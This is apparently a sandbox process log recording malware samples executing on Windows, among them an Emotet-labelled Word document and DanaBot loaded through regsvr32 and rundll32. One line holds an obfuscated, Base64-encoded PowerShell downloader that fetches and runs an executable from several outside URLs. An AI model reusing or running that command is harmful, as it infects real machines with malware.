C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8272,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7816,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=7868 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=8300,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=8608,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=8448,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8692 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=8836,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9088,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9080 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=8968,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=868,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=8404,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6088,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8468 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6156,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6152 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=3364,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=5348,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9812,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=9772,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8368,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10028,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9448 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=6244,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=7976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=9120,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=5196,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9536,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9608 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=5208,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=10112,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=8664,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=5332,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=8112,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5320,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9508 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=10104,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9396,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10372 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\[email protected]" /o ""
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=10472,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10488,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10156,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:8
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@7160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7160 -ip 7160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 460
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9628,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9044 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6240,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10364 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=10620,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10604,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10688,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10636 /prefetch:8
C:\Users\Admin\Downloads\Funsoul.exe
"C:\Users\Admin\Downloads\Funsoul.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=10592,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10668,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10160 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9092,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10448 /prefetch:8
C:\Users\Admin\Downloads\Lacon.exe
"C:\Users\Admin\Downloads\Lacon.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\Bndt32.exe
C:\Users\Admin\Downloads\Lacon.exe
"C:\Users\Admin\Downloads\Lacon.exe"
C:\Users\Admin\Downloads\Lacon.exe
"C:\Users\Admin\Downloads\Lacon.exe"
C:\Users\Admin\Downloads\Lacon.exe
"C:\Users\Admin\Downloads\Lacon.exe"
C:\Users\Admin\Downloads\Lacon.exe
"C:\Users\Admin\Downloads\Lacon.exe"
C:\Users\Admin\Downloads\Lacon.exe
"C:\Users\Admin\Downloads\Lacon.exe"
C:\Users\Admin\Downloads\Lacon.exe
"C:\Users\Admin\Downloads\Lacon.exe"
C:\Users\Admin\Downloads\Lacon.exe
"C:\Users\Admin\Downloads\Lacon.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=10460,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10348,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10424 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8668,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6620 /prefetch:8
C:\Users\Admin\Downloads\Pikachu.exe
"C:\Users\Admin\Downloads\Pikachu.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=8600,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10456,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10308,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10368 /prefetch:8
C:\Users\Admin\Downloads\Prolin.exe
"C:\Users\Admin\Downloads\Prolin.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10176,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10336 /prefetch:8
C:\Users\Admin\Downloads\Prolin.exe
"C:\Users\Admin\Downloads\Prolin.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=9456,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=10264,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
